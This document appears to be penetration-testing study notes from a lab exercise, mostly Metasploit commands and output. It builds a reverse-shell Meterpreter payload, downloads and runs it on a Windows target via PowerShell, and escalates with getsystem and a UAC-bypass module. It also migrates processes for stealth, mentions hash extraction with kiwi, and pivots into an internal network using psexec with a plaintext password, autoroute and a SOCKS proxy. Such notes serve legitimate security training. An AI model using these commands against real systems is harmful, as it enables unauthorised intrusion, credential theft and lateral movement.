# Create a non-staged payload
$ msfvenom -p windows/x64/meterpreter_reverse_https LHOST=192.168.45.232 LPORT=443 -f exe -o met.exe
# Setup listener
$ sudo msfconsole -q
msf6 > use exploit/multi/handler
msf6 > set PAYLOAD windows/x64/meterpreter_reverse_https
msf6 > set LHOST tun0
msf6 > set LPORT 443
msf6 > run
# Download and execute the payload on the target
$ nc 192.168.241.223 4444
Microsoft Windows [Version 10.0.22000.1219]
(c) Microsoft Corporation. All rights reserved.
C:\Users\luiza>powershell iwr -uri http://192.168.45.232/met.exe -OutFile met.exe
powershell iwr -uri http://192.168.45.232/met.exe -OutFile met.exe
C:\Users\luiza>.\met.exe
.\met.exe
# Catch the reverse shell
msf6 exploit(multi/handler) > run
[*] Started HTTPS reverse handler on https://192.168.45.232:443
...
[*] Meterpreter session 1 opened (192.168.45.232:443 -> 192.168.241.223:49595) at 2025-04-24 11:08:44 +0300
meterpreter >
Inactivity Check
Determines user inactivity; useful for stealth.
meterpreter > idletime
Privilege Escalation
Attempts SYSTEM-level access using techniques like Named Pipe Impersonation leveraging the SeImpersonatePrivilege and SeDebugPrivilege.
meterpreter > getsystem
Process Migration
Moves session to another process to maintain stealth/persistence. Migration is only possible to processes with equal or lower security levels.
meterpreter > ps
meterpreter > migrate <PID>
If no suitable existing process is available, it can start a hidden process and migrate into it.
execute -H -f notepad
migrate <PID>
Modules
UAC Bypass
A typical client-side attack usually provides only an unprivileged shell. However, when the target user is a local administrator, we can attempt to elevate the shell's integrity level by bypassing User Account Control (UAC).
The process below (5656) is running with a medium integrity level, meaning administrative actions would still be blocked by UAC.
# Identify current privilege/integrity level
meterpreter > shell
Process 5656 created.
...
C:\Windows\system32>powershell -ep bypass
PS C:\Windows\system32> Import-Module NtObjectManager
PS C:\Windows\system32> Get-NtTokenIntegrityLevel
Medium
# Escalate privileges
PS C:\Windows\system32> ^Z
Background channel 1? [y/N] y
meterpreter > bg
[*] Backgrounding session 2...
msf6 exploit(multi/handler) > search UAC
...
21 exploit/windows/local/bypassuac_sdclt 2017-03-17 excellent Yes Windows Escalate UAC Protection Bypass (Via Shell Open Registry Key)
...
msf6 exploit(multi/handler) > use 21
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/local/bypassuac_sdclt) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
2 meterpreter x64/windows ITWK01\offsec @ ITWK01 192.168.45.232:443 -> 192.168.241.223:49294 (192.168.241.223)
msf6 exploit(windows/local/bypassuac_sdclt) > set session 2
session => 2
msf6 exploit(windows/local/bypassuac_sdclt) > set LHOST 192.168.45.232
LHOST => 192.168.45.232
msf6 exploit(windows/local/bypassuac_sdclt) > run
...
meterpreter > shell
Process 7068 created.
C:\Windows\system32>powershell -ep bypass
PS C:\Windows\system32> Import-Module NtObjectManager
PS C:\Windows\system32> Get-NtTokenIntegrityLevel
High
Kiwi
With elevated privileges with can also load MSF's extensions, such as kiwi, a wrapper around mimikatz. The creds_msv extracts LM and NTLM hashes.
We can manually add a route to the second network (172.16.16.0/24) through the existing session in order to enable MSF to route traffic through a compromised host. This allows Metasploit to "see" and interact with devices on that internal network.
Routes in Metasploit let you scan and exploit targets behind firewalls or NAT by tunneling through a compromised host.
meterpreter > bg
[*] Backgrounding session 5...
msf6 exploit(multi/handler) > route add 172.16.196.0/24 5
[*] Route added
msf6 exploit(multi/handler) > route print
IPv4 Active Routing Table
=========================
Subnet Netmask Gateway
------ ------- -------
172.16.196.0 255.255.255.0 Session 5
[*] There are currently no IPv6 routes defined.
msf6 exploit(multi/handler) > use auxiliary/scanner/portscan/tcp
msf6 auxiliary(scanner/portscan/tcp) > set RHOSTS 172.16.196.200
RHOSTS => 172.16.196.200
msf6 auxiliary(scanner/portscan/tcp) > set PORTS 445,3389
PORTS => 445,3389
msf6 auxiliary(scanner/portscan/tcp) > run
[+] 172.16.196.200: - 172.16.196.200:445 - TCP OPEN
[+] 172.16.196.200: - 172.16.196.200:3389 - TCP OPEN
[*] 172.16.196.200: - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
With the route added, we can now use MSF modules to compromise the second target. The bind_tcp payload is used because the target can’t initiate outbound traffic, but our attacking machine can connect to it instead.
msf6 auxiliary(scanner/portscan/tcp) > use exploit/windows/smb/psexec
...
smsf6 exploit(windows/smb/psexec) > set SMBUser luiza
SMBUser => luiza
msf6 exploit(windows/smb/psexec) > set SMBPass 'BoccieDearAeroMeow1!'
SMBPass => BoccieDearAeroMeow1!
msf6 exploit(windows/smb/psexec) > set RHOSTS 172.16.196.200
RHOSTS => 172.16.196.200
msf6 exploit(windows/smb/psexec) > set PAYLOAD windows/x64/meterpreter/bind_tcp
PAYLOAD => windows/x64/meterpreter/bind_tcp
msf6 exploit(windows/smb/psexec) > set LPORT 8000
LPORT => 8000
msf6 exploit(windows/smb/psexec) > run
...
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
Autoroute
Instead of adding routes manually, the autoroute module automatically adds all routable subnets from the compromised host.
msf6 exploit(multi/handler) > use multi/manage/autoroute
msf6 post(multi/manage/autoroute) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
7 meterpreter x64/windows ITWK01\luiza @ ITWK01 192.168.45.232:443 -> 192.168.241.223:50215 (192.168.241.223)
msf6 post(multi/manage/autoroute) > set SESSION 7
SESSION => 7
msf6 post(multi/manage/autoroute) > run
[*] Running module against ITWK01
[*] Searching for subnets to autoroute.
[+] Route added to subnet 172.16.196.0/255.255.255.0 from host's routing table.
[+] Route added to subnet 192.168.241.0/255.255.255.0 from host's routing table.
[*] Post module execution completed
Socks_proxy
With a route in place, the socks_proxy module sets up a SOCKS5 proxy server on the attacker's machine. This enables tunneling through compromised host using proxychains, which lets any external app (like RDP clients) act as if it’s inside the internal network.
SOCKS proxy + proxychains = full tool access to pivoted networks.
msf6 post(multi/manage/autoroute) > use auxiliary/server/socks_proxy
msf6 auxiliary(server/socks_proxy) > set SRVHOST 127.0.0.1
SRVHOST => 127.0.0.1
msf6 auxiliary(server/socks_proxy) > set VERSION 5
VERSION => 5
msf6 auxiliary(server/socks_proxy) > run -j
[*] Auxiliary module running as background job 0.
[*] Starting the SOCKS proxy server
Instead of a SOCKS proxy, we can forwards traffic from the attacker's machine directly to the internal target. This maps an internal service to a local port, allowing direct tool access.
